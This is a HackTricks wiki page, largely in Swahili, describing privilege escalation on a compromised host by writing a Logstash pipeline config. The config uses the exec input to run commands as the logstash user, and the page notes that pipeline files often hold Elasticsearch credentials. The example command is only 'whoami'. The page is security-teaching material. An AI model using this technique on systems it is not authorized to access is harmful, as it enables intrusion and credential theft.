Logstash

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Logstash

Logstash inatumika kwa kusanya, kubadilisha, na kutuma logi kupitia mfumo unaojulikana kama pipelines. Pipelines hizi zinajumuisha hatua za input, filter, na output. Kipengele cha kuvutia kinajitokeza wakati Logstash inafanya kazi kwenye mashine iliyoathiriwa.

Pipeline Configuration

Pipelines zinapangiliwa katika faili /etc/logstash/pipelines.yml, ambayo inataja maeneo ya mipangilio ya pipeline:

# Define your pipelines here. Multiple pipelines can be defined.
# For details on multiple pipelines, refer to the documentation:
# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html

- pipeline.id: main
path.config: "/etc/logstash/conf.d/*.conf"
- pipeline.id: example
path.config: "/usr/share/logstash/pipeline/1*.conf"
pipeline.workers: 6

This file reveals where the .conf files, containing pipeline configurations, are located. When employing an Elasticsearch output module, it's common for pipelines to include Elasticsearch credentials, which often possess extensive privileges due to Logstash's need to write data to Elasticsearch. Wildcards in configuration paths allow Logstash to execute all matching pipelines in the designated directory.

Privilege Escalation via Writable Pipelines

Ili kujaribu kupandisha hadhi, kwanza tambua mtumiaji ambaye huduma ya Logstash inafanya kazi chini yake, kawaida ni mtumiaji logstash. Hakikisha unakidhi moja ya vigezo hivi:

Kuwa na ufikiaji wa kuandika kwenye faili ya pipeline .conf au
Faili ya /etc/logstash/pipelines.yml inatumia wildcard, na unaweza kuandika kwenye folda lengwa

Zaidi ya hayo, moja ya masharti haya lazima itimizwe:

Uwezo wa kuanzisha upya huduma ya Logstash au
Faili ya /etc/logstash/logstash.yml ina config.reload.automatic: true imewekwa

Ili kuwa na wildcard katika usanidi, kuunda faili inayolingana na wildcard hii inaruhusu utekelezaji wa amri. Kwa mfano:

input {
exec {
command => "whoami"
interval => 120
}
}

output {
file {
path => "/tmp/output.log"
codec => rubydebug
}
}

Hapa, interval inatambulisha mzunguko wa utekelezaji kwa sekunde. Katika mfano uliopewa, amri ya whoami inatekelezwa kila sekunde 120, na matokeo yake yanaelekezwa kwenye /tmp/output.log.

Kwa config.reload.automatic: true katika /etc/logstash/logstash.yml, Logstash itagundua na kutekeleza kiotomatiki mipangilio mipya au iliyobadilishwa ya pipeline bila kuhitaji kuanzisha upya. Ikiwa hakuna wildcard, mabadiliko bado yanaweza kufanywa kwa mipangilio iliyopo, lakini tahadhari inashauriwa ili kuepuka usumbufu.

Previouslxd/lxc Group - Privilege escalation Nextld.so privesc exploit example

Last updated 7 days ago